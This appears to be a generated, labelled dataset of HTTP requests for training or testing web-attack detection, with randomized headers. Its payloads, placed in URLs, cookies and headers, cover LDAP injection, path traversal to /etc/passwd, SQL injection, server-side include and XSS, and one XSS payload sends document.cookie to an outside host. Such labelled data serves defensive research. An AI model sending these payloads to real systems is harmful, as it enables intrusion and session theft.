Via: 6.4 www.sejcar.js, 0.2 98.234.185.245
Transfer-Encoding: h1qs; t6eeri7=mmse
Upgrade: oEAO/0.4, NrmE/9.1, 2tirU/3.2, dprdqi/9.1, ejn2sn/3.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 84.40.27.181
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37136
Start - Id: 38207
class: LdapInjection
GET /esrrluoen.cfm?zondyhn=hXpgwU2&heelti=3521323&plAuiz1cxipe=f+&80e0XzusrKzmPV=ea&edinA=%29+%28+%7C+%28Amwr%3D4j5*%29 HTTP/1.1
Host: 196.235.125.56
Connection: close
Accept: image/jpeg, application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.2, gzip
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 9.211.101.123
Cookie: qmdwkVN_bgsoundo=rh8tl5aloeDe
Cookie2: $Version="98"
Date: Sat, 11 Aug 07 21:48:59 UTC
ETag: W/"3Y.V7xSdTXxLud-DJe4"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Sat, 14 Feb 09 13:01:18 UTC
If-Unmodified-Since: Fri, 02 Jul 04 23:40:55 UTC
If-Match: *
If-None-Match: *
If-Range: "RuRknExHSUWfriMnci-"
Max-Forwards: 67
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: Digest uri=http://goeM.net/n2nmLre/smplsart/1jaryo2u/3hhrpez/sjhcrsnt.js
Range: 143609-2,-687,75-
Referer: /oekla/Irao/eeDdm5/mjr3gb/adheuj.wmn
TE: trailers
Trailer: Warning
User-Agent: Mozilla/2.0 (Windows; U; WinNT 5.2; 7s-a5; rv:0.6.5) Gecko/18946921
UA-CPU: StrongARM
UA-Disp: 6450,8964,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 321x2267
Via: FTP/7.9 www.osnj7.png
Transfer-Encoding: deflate
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 992 125.247.183.112 "nanhweegsreqQSamRs" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38207
Start - Id: 46304
class: PathTransversal
GET /dGqQ/pn@AO7Achf7a9POHCG/i2/lyaEsrzielei/lnQJriFedyw8/eaSehOyjrtee8aanaea5/8DcSs@VrCjgXyf_4.-m/ojgDKlkQzd/sF/bup_vwY8M/binSdhUCXU.gif?2RcfOdeh=946&ttgetPIa=h%25uq&K7vxYcM@=474&driNlhsRouecN=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&7aVtelnet=rE1f66tv0Fmq HTTP/1.0
Host: 224.142.12.116:61216
Connection: hgallo4t
Accept: text/*;q=0.6, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: compress, identity;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 206.214.212.144
Cookie: 8RD@p_@=3107504;weplj=un n\n;sperlLshutdown=eqxp_naO)~ER6oalinktranrq;jentban=2088628350;orA1eyusSpOmegN=2H.qaJXUcJk
Cookie2: $Version="05"
Date: Tue, 23 Nov 04 11:41:00 UTC
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 24 Aug 06 19:25:14 GMT
If-Unmodified-Since: Thu, 07 Oct 04 13:55:09 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jul 09 10:55:43 CET
Max-Forwards: 685
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: aipJ gheooifl=9eb9
Range: 5-,07-2
Referer: http://www.ittvecl.cz/seyasuEr/0oytbn.php
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.3 (Windows; U; Win98 4.3; l9-on; rv:3.7.6) Gecko/36051709
UA-CPU: Sparc
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 3.7 www.yilftr.gif:2112, ait/3.7 103.159.168.69
Transfer-Encoding: identity
Upgrade: ses/1.2, oIU6/4.9
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46304
Start - Id: 38873
class: LdapInjection
GET /8hhrhfCnglc9dwffo/xK.Hrz4I/8X9SYdW@/acE/tSvNLjQJ/txRWs/InJformiU1nJ_/jTCLu8l_K/Q2JRIwrVBIQ/wX@OnkGkHWvu0mnGIxX.gif?rTte9zee=fiE+irhinegie&ac=admintis&ch45Utare=9tn5ZPhAtMD&C31snU6=89&cf=46%29%28%26%28objectClass%3Derde%29%28%7C%28sn%3D+Dot%29%28cn%3Dbowe+++J*%29%29&gzdihrlbhyetltd=268&ooa=ss3t3LKJ8bo HTTP/1.0
Host: 70.28.118.189
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 9.41.106.201
Cookie: passthruViX=621854;Rspar=irCghp;9iHzoahhsotg=41;r23retiwp7pme=dXFloKY_uQwA;ipositionHwt7OU2=j5n3ete5oesheca
Cookie2: $Version="37"
Date: Sat, 08 Sep 07 18:40:05 CET
ETag: "OCfbQBx-AQOh@IfI"
Expect: aetlNI
From: w08rh3@rpehekeyi.com
If-Modified-Since: Fri, 06 Feb 09 23:41:50 CET
If-Unmodified-Since: Sun, 21 Dec 08 15:58:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1250
MIME-Version: 2.9
Pragma: a=pybortsb
Proxy-Authorization: Digest nc=7636d743
Authorization: Basic ZWVmaXdhOnFjYXkzYQ==
Range: 15934-,799-8058,-81465
Referer: http://duiipcd.ch/sfes/0qht.tar.gz
TE: trailers
Trailer: Via
User-Agent: enlthsg/6.1.2
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: HTTP/4.8 255.165.232.163
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 228 131.50.157.24 "wenaeger" "Thu, 22 Dec 05 05:32:10 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 706863
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38873
Start - Id: 46042
class: PathTransversal
GET /eCo_fCaGa/hE/awY/yBcvihyw/vyiwenh0oicemta2wwoa/nfSrIo59RtAet5nqi/re5sc2rn/oofiSetyt/V1ZKZOigstdin/qllnjrwokwiwh8dRtli/exLaG.jsp?aNgotnbH=vma0artjasacnshf HTTP/1.1
Host: www.hhygneen.de:5762
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Accept-Language: Emat-dpaeotte;q=0.9, nfsrcu-rdd, dXHabe-eotyi;q=0.0, tees4rE-sI, e6rssS-tei
Date: Fri, 08 Apr 05 01:49:48 GMT
Expect: 100-continue
If-Modified-Since: Mon, 02 Aug 04 24:44:34 CET
If-Range: "8MKCZ_2Z3QutOzeOB2"
Referer: /ioxo3l/mtcd.mpeg
TE: trailers,deflate;q=0.9,gzip;q=0.9
User-Agent: Mozilla/4.6 (Machintosh; U; PPC Mac OS X 8.6; Rr-8r; rv:3.7.7) Gecko/34883884

null

End - Id: 46042
Start - Id: 46741
class: XSS
GET /-n/39QDHPU7dJx0.html?i1EthulrqgesbE=041306&ilxeehsEa=4&eebroo2r263exw=fi&a6R=8rii&w@Vs-mEHvar=r+q+er%5Bprocessing-instructionoexechc&o1top=w+xnrnenc&xm35Ptprocessing-instruction-w=54292952&s9adtlobe=9&Az=81238602&nr=7383 HTTP/1.1
Host: 47.28.111.135
Connection: ctutor
Accept: video/*, video/quicktime;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: he-l, gjt9-chsrn;q=0.4, u-LzD;q=0.6, 3-sysg;q=0.9, f6-LunL3Bs
Cache-Control: no-cache
Client-ip: 187.192.160.132
Cookie: GMZ5W=<div   style  ="  background-image:    url(javascript:    [alert('iei');]);    ">;di=uc2+exstsXoIweWt;htpassLgqV2A7A=oMC3jjiaX
Cookie2: $Version="780"
Date: Sat, 18 Apr 09 09:53:08 UTC
ETag: W/"rEUbqZB6wCS7E9F1qCD"
Expect: 100-continue
From: vpiisea@ttsPnero.gov
If-Modified-Since: Fri, 14 May 04 09:24:32 CET
If-Unmodified-Since: Mon, 04 Oct 04 22:25:32 CET
If-Match: *
If-None-Match: "Bt@N5CqA5RuBBaaGUU0"
If-Range: Wed, 28 Apr 04 19:09:37 GMT
Max-Forwards: 8
Pragma: eahfr=dEIithle
Proxy-Authorization: ehdls lqmtt=7Lihahj
Authorization: niiy usiecns=hrnon
Range: 50922-39,75-,00-
Referer: /4cbaowiA/cemaeln/icsg.fgf
TE: trailers
Trailer: Range
User-Agent: Mozilla/8.0 (compatible; MSIE 2.6; Open BSD i386; Geeneiet; surt6d)
UA-CPU: x86
UA-Disp: 2238,7831,8
UA-OS: Win98
UA-Pixels: 554x016
Via: 1.4 132.237.121.164
Transfer-Encoding: identity
Upgrade: acef/9.1
Warning: 547 www.iirwnee.tiff "beStC" "Tue, 20 Dec 05 19:05:57 UTC"
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46741
Start - Id: 47768
class: XSS
GET /tKLzXtVA0jLR1yz/hfsTeattr/tfY/SJW/elZq9y8vnGGW2r/agooeoessnserburl/jileota/3il8qhL7aohtd4th.aspx?esol2oafc=pshflasaaarih&Aoicca=6&RvngE1=n42&ssac=o&oee17aufD=176219&kArmTrrtwhaae=miebuh2Aoirhr&i4lle=ch0atv&sxUeekehIb=n0dodu%28aAdVh5&7z3go=fnq+&sonnj1fsPetnmu=iron1d&fromlMCmkcatmLV=%3Cimg++dynsrc++%3D+++%22++javascript%3A++++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.seil.com%2Fcgi-bin%2Frolirist.cgi%27%2Bdocument.cookie%29%3B%5D+%22++%3E&aeir4y=Eof4waaesvg&owasimI=nm+aEdocument1Mtosyet+&eerpshss4e=Hdn HTTP/1.1
Host: www.p1oae.gov:0665
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: utf-8;q=0.1, shift_jis, iso-8859-8;q=0.7, iso-10646-ucs-2, windows-1255
Accept-Encoding: *;q=0.9
Accept-Language: l9hd-e;q=0.2, kkx-mta1, wloeeeeg-RHdt, n-b1daJ, efIeu-ylhn;q=0.3
Cache-Control: no-store
Client-ip: 226.81.74.174
Cookie: fitytSArve=tgiaat;nwaPianh=o;ntuoEbt=ruUrsu62sboteK;9Sh0J.copyxy=89091;t5CarrFah=tgo
Cookie2: $Version="49"
Date: Fri, 30 Jan 09 13:52:03 UTC
ETag: "q@9vcjf95.j6GZXaYbP"
Expect: nhsE=jgeiwe
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Thu, 03 Mar 05 17:48:33 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 935
MIME-Version: 3.5
Pragma: g8=h0T
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: asgu eNir55I=ndip
Range: 0-6,74113-
Referer: http://se1iye9.gov/7ymEa.pl
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/8.2 (compatible; Konqueror/2.4; Open BSD i586; jeafnhsab; orpdkrtm9o)
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 2539x540
Via: 2.2 203.44.142.214, maz3ae/1.5 www.tytq8ic.jpeg
Transfer-Encoding: compress
Upgrade: Hooma/8.6, 5ec/4.1, Renu/5.6, 5nddy6/0.2, alr4/7.7
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47768
Start - Id: 46643
class: XSS
GET /3fKPQEEr3FZx-SXBJZmP/fv4h/t9o9OLbmytVvg3J/lsrrcsarDe/amlqoMEp6/rAb.css? HTTP/1.0
Host: www.Rirh.de:3
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic, windows-1254;q=0.0, macintosh
Accept-Encoding: *
Accept-Language: <img+src=javascript:  alert  ('aee7o.1eo')   >
Cache-Control: max-stale=45186
Client-ip: 173.63.25.136
Cookie: cenmnwvjrE=hmwgetp
Cookie2: $Version="007"
Date: Thu, 01 Nov 07 05:31:43 CET
ETag: "Eur9H_NKXYCh-Wi0X"
Expect: d6ab
From: cqaeaaah@nrelbeNo.fr
If-Modified-Since: Wed, 17 Mar 10 03:13:05 GMT
If-Unmodified-Since: Mon, 14 Jun 04 13:27:06 CET
If-Match: *
If-None-Match: "kGlFGGOKiGqKOr-TUrgH"
If-Range: Fri, 20 Jun 08 12:18:38 CET
Max-Forwards: 59
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic YW9kdFRlZTpjY2Vs
Authorization: Digest nc=ba24d2A6
Range: 118-482,-132
Referer: http://iEvucy.biz/lZEdl1p/ace6m/2atw3.zip
TE: trailers
Trailer: Authorization
User-Agent: ecwaegl/3.2.9
UA-CPU: StrongARM
UA-Disp: 5349,685,16
UA-Pixels: 4819x5235
Via: ehLerY/1.6 84.38.170.152:74, FTP/6.9 www.em5r.html, orie0/5.1 50.201.58.124
Transfer-Encoding: compress
Upgrade: Ecza/9.5
Warning: 005 www.emolte.jpeg:48324 "esss" "Sat, 15 Aug 09 23:29:10 GMT"
X-Serial-Number: 4075489
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46643
Start - Id: 42245
class: SqlInjection
GET /9Nk66z7pjr/uc5Z161JOubUzJIBMAD/ls@_4rVTI/doatsst/eriaevtefhitAini/iI.css?amkntp=naf8hMx8pfnkor9e&1sut=xXB1yy&ran3nets=um+9lna2dnIn&ehmboeeoi=%27%3B++insert+++++into++eit++values%28666%2C%27fa%27%2C%27haen%27%2C0xfffff%29&%uS1Z=rh8R%25t&Rit2eoeunrTqhao=%5Dspasswdp&5oeelxnjknsoe=6i6VgHPZCRbM&fg2V0au5=ps5ejdt&tdh23i=ot0a&uMoloti6oyT=uA_VIRpc%40&isfdre=irEIeM HTTP/1.1
Host: 46.60.182.20:607
Connection: sTdge
Accept: image/*;q=0.7, image/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: d3rsSun-n, gY-irt;q=0.4, em-einnisg, ou4feeso-ira;q=0.1
Cache-Control: lwskd=embt
Client-ip: 83.53.205.169
Cookie: t7s642e=c;kjQKcbpVQLea=7;reyteshsE=iaa;wchpergatheWk=85
Cookie2: $Version="37"
Date: Tue, 14 Mar 06 17:52:14 CET
ETag: "AwZJ1R96_ZwyUkum"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Fri, 09 Jun 06 07:28:13 UTC
If-Unmodified-Since: Tue, 19 Dec 06 07:38:26 GMT
If-Match: "XhGjAGCdCVGiC02GIYzt"
If-None-Match: *
If-Range: *
Max-Forwards: 2022
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: Digest response="fdABD60040aBd3c0B3B33eC26Bca4A8f"
Range: 4539-14148,-19,934-
Referer: http://rRfaos.net/oerad4.msf
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.3 (Windows; U; Win98 3.1; NO-ab; rv:1.0.6) Gecko/78406370
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: HTTP/1.9 25.245.83.106
Transfer-Encoding: gzip
Upgrade: rRra/8.9, int0ly/0.7
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42245
Start - Id: 42355
class: SqlInjection
GET /Ldtoeengbar.cgi?tpeioopn=ointqtwindow.openi&ncaGne3=60144&eifOuv=or+0%3C%3E%28select++count%28*%29+++++from+++yaghnl%29&3qPhP6locationpK=9eonullv&ixto9a=irbsrc5Toi2m6a1t&odesCcnse=etd3nSdln0re&etsaysaE=deleteAtelnet HTTP/1.0
Host: 98.94.61.11
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: utf-8, x-mac-chinesesimp;q=0.6, macintosh;q=0.7, iso-8859-3;q=0.9, iso-2022-kr;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-stale=12
Client-ip: 34.178.32.79
Cookie: ou=tto9;Titiorni=Iq>'nitqe;st=5283;0tzetahpaorzog=eroh
Cookie2: $Version="89"
Date: Mon, 07 Sep 09 12:57:49 UTC
ETag: "Jzw07-CaqNHQ-4c"
Expect: ieiqg
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Fri, 18 Jun 04 09:17:23 UTC
If-Match: *
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Wed, 21 Feb 07 16:25:05 CET
Max-Forwards: 5
MIME-Version: 6.6
Pragma: nllcigJd=tehts9t
Proxy-Authorization: NTLM dWVtZjVhZVpub2RucmxwaW1ib2luaGlub29hU3RwYTE=
Authorization: NTLM c3V0aWFFbXpsN1lmZHJ0ZW91dm5ldHR1YXgycnJjYXI3c3JzeGNycnVydG43
Range: -966,396-333,-3990
Referer: /ieimnqg/6thq/msnues/nahnnr.tar
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: sonsubaeo (iqAFtg)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: FTP/0.2 60.178.177.40
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 408 www.eaxt.js "r7iatenLagSol" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42355
Start - Id: 38327
class: LdapInjection
GET /8T_fqy8L6TncVFAKF9i/HXDrMzchildA@.jpeg?tdi=%29+++%28+%7C++++%28++++cn%3D*o++%27brien*++%29%28mail+++%3D*o++++%27brien*%29++&vtoAdcfg4eop=I HTTP/1.1
Host: www.naloHnwa.st:3681
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.4, iso-8859-9, utf-8;q=0.6, iso-8859-7;q=0.3
Accept-Encoding: deflate;q=0.3, identity, identity
Accept-Language: izeGy-wde9h;q=0.2
Cache-Control: no-store
Client-ip: 7.88.170.148
Cookie: ru=8;tesseenehaldd=ocOKh
Cookie2: $Version="66"
Date: Fri, 08 May 09 18:58:26 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: atq5uIk=lcLmsuZ;i3ece4=Swd7rg
From: ze0mxcoe@eemraasrs.com
If-Modified-Since: Sun, 11 Jan 04 09:10:30 CET
If-Unmodified-Since: Sat, 13 May 06 13:49:57 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: ene3e tBebc=fcidjwou
Range: -717,218781-
Referer: /exrjdr/ns2gNhe/enEob/msio2S.sh
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (X11; U; Linux i386 0.0; 5F-ps; rv:3.3.6) Gecko/29084339
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: 3Nydke; teyae=enotl
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38327
Start - Id: 45029
class: PathTransversal
PUT /aj_pOK/yHIb/msLD8_Knp9tVyjU2Y/ous9apqthyaa0i/tO.gaWG-P/varm5lBCc5Stmp/2swn/sah.js? HTTP/1.1
Content-Length: 214
Content-Language: tho,emsisGx,dfZ
Content-Encoding: gzip
Content-Location: /y21s/rEy3rsC/jsUthdz.pl
Content-MD5: cmRmZXZsVHRLdGVJZU9tZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 May 06 22:38:59 CET
Last-Modified: Wed, 05 Sep 07 12:25:43 UTC
Host: 100.204.47.21:4
Connection: trrop6
Accept: application/rtf, video/mpeg, audio/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=3349
Client-ip: 22.24.231.229
Cookie: yBIo2g=0;wccSn=eo;o3Haynm=a-HxdgjjnxO;td=copyn3;gttdmtt0cgwU=%2e%2e.\%252f/\%252f/...\%252e..%2e;twhbetweenCWE=cSh7wh
Cookie2: $Version="5"
Date: Wed, 18 Aug 04 09:17:01 GMT
If-Modified-Since: Fri, 26 Mar 04 01:26:19 CET
If-None-Match: *
If-Range: Mon, 31 Aug 09 07:10:33 UTC
Max-Forwards: 5
Pragma: l='eo'
Authorization: Basic YmZKcXRpcGg6b3ByTGVFM3M=
Range: 100-
Referer: /01te2m/phapned/jrmace/temsM.mdb
TE: gzip,trailers
User-Agent: fliiIesS
Via: Vee/9.5 www.snooy.htm, FTP/6.8 www.ttoln.gif
Upgrade: aajI/8.4, aEpT/8.8
X-Forwarded-For: 206.19.206.22
X-Serial-Number: 8285555437517823
----: ---------------

bs=o;euoxvmto)l&aeugshsl=vheIsle4c&VJEgQ8fkwindow.open=115&eG=9451107&svimtqm1s9=3httpt&-9aFTk8var5ZWu=like@0aU&Rmt4hjwGyom=n Al(&efDhti= txud&inaw7tisspxuzde=14275&lemseoohse=RVhhaqtnf&vPWK=60&uuezz=212294

End - Id: 45029
Start - Id: 39081
class: LdapInjection
PUT /9i6i89/ftpZ/h.NP2kfXp/dr4bOks7oDhwktcmtYe/1GYn0zK6ocwz/980htFvyTY4.VSO3L9.php4? HTTP/1.1
Content-Length: 190
Content-Language: her,ln
Content-Encoding: gzip
Content-Location: http://xhbebaur.com/nmaeolan/spmN/vessI/liuaMo.php3
Content-MD5: ZUVvcmV5bmVkZFdhc3M3bw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Feb 06 05:41:14 CET
Last-Modified: Tue, 29 Aug 06 02:12:01 UTC
Host: 148.38.180.178:2
Connection: lltbirlx
Accept: */*;q=0.1
Accept-Charset: iso-8859-2;q=0.5, cp-950;q=0.8, windows-1254;q=0.6, iso-8859-9, windows-1251
Accept-Encoding: *;q=0.6
Accept-Language: nkn-its, 9t-gqlti1r, ibopnoh-dmvres, 68iieDn6-Nsttedee;q=0.5, wldnrs-s
Cache-Control: s='mogHRr'
Client-ip: 120.65.51.179
Cookie: 4ri9tntvn=")(targetfilter=(o=NetscapeRoot));dahoanpsO=217;iLsrihe=07830;HWHPku=125
Cookie2: $Version="388"
Date: Thu, 10 Aug 06 12:53:42 CET
ETag: W/"kU9PGb3KTDiEMo@Os"
Expect: aeO1Anr=fno2;aymr
From: ogr3i@6itedeoo2.it
If-Modified-Since: Mon, 18 Jun 07 10:46:46 CET
If-Unmodified-Since: Mon, 05 Apr 04 11:44:40 GMT
If-Match: "i9fLEntcZpd70K5bF"
If-None-Match: *
If-Range: Mon, 29 Aug 05 13:30:21 UTC
Max-Forwards: 611
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: seyne9 hsjrs=osdEn
Authorization: Basic bkgwYzpsczEz
Range: 873758-,119-,-34849
Referer: http://www.3L4eeet.com/rdeatre.aspx
TE: gzip;q=0.3
User-Agent: ozflmuert
UA-CPU: x86
UA-Color: color16
UA-Pixels: 8769x0131
Via: FTP/4.6 www.tneor.tiff
Transfer-Encoding: 5aMc; rxiort5=Eqoo
Upgrade: aefapw/7.1, Svcea/8.4
Warning: 529 www.iaEnlc.shtml "HhusNdbemwiiMof7rg" 
X-Forwarded-For: 22.168.245.53
X-Serial-Number: 89933441893
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

neeaeuhhh=1\tgqoSlu0id%il&5hoxdnm=6670&autoexecQSyaQ2=anwoRti3duEeopr&hioaareJtrxZroR=06864&SdocumentPC0=;0&awy9ejoH94n=co33&P88=17&7iootic=exikSyo9@.P&arvllilfta=en-&eaegen=02003404

End - Id: 39081
Start - Id: 39256
class: SSI
GET /tJ0lfSA_KGwu/saRWu_TfLaQP/acllcrxnnsodhf.pl?lE=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&nadrexl6ohsei6q=de&toprq3nc=97 HTTP/1.0
Host: www.slcteX52as.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.4, x-mac-roman;q=0.2, cp-932, x-mac-japanese
Accept-Encoding: 
Accept-Language: s-cTptd;q=0.5, ti-anrlo2CO
Cache-Control: ioNDu=esa9t
Client-ip: 185.110.139.50
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="96"
Date: Sun, 01 Apr 07 01:09:17 UTC
ETag: "I6x001IZy.Iz5lBYh"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 07 Jul 06 21:22:10 UTC
If-Unmodified-Since: Sat, 13 Jan 07 14:44:02 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 533
MIME-Version: 2.5
Pragma: uvphOt='ig8st'
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: Digest uri=/gnIjr6e/asyt.cgi
Range: 5-9725,-6683
Referer: /deah1si/mrm0/t9tso.php
TE: chunked,trailers
Trailer: If-Range
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 3.1; u7-kq; rv:6.1.8) Gecko/32780306
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 272x2054
Via: 9.3 www.wmo2ho.png, 8.1 www.naierm.shtml, HTTP/7.0 www.luree.html
Transfer-Encoding: identity
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 175 www.eSis7tea.tiff:885 "oeto0awd6ika" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39256
Start - Id: 41525
class: SqlInjection
POST /idLzvuen/468/GrPiinputhtaccesfrom8h2W8q/oeheseo/sg9Mx-X36_bnEk3JkTmy/V2HGMIIainsertgr/orbj_isrU_8.nsf? HTTP/1.1
Content-Length: 266
Content-Language: geuaaoe,o8ttl,rW
Content-Encoding: deflate
Content-Location: http://huii.st/neEuz/oaht.asmx
Content-MD5: bmVhOTF5TGVzc25ublo2cA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Sep 06 23:19:19 UTC
Last-Modified: Fri, 04 Jun 04 19:23:35 UTC
Host: www.soiLcvyCni.be
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 17.229.40.102
Cookie: Ott=8lcWhFi;8.evZ5sb=73;niTNStkrtlwlpdm=t
Cookie2: $Version="66"
Date: Thu, 18 Aug 05 21:07:00 UTC
ETag: W/"bX0Vg3Kd8@oR3w41"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Mon, 18 Oct 04 04:07:12 UTC
If-Unmodified-Since: Mon, 16 Oct 06 24:53:42 UTC
If-Match: *
If-None-Match: "3xUBxLd5HYz4MbKBl_"
If-Range: "zmIakQ3LrF_GoqfE"
Max-Forwards: 9
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: NTLM aXJ5OGV2b2Vvb3JzeWlvdGFpNXJtbkVpbnM3ZUV0bGRsd29jc2RpZWF0
Range: 911566-290,4666-98
Referer: http://www.love0i.biz/ortwi/tsIacsno.cgi
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/3.9 (Windows; U; Windows NT 2.3; ut-to; rv:8.8.9) Gecko/93635700
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
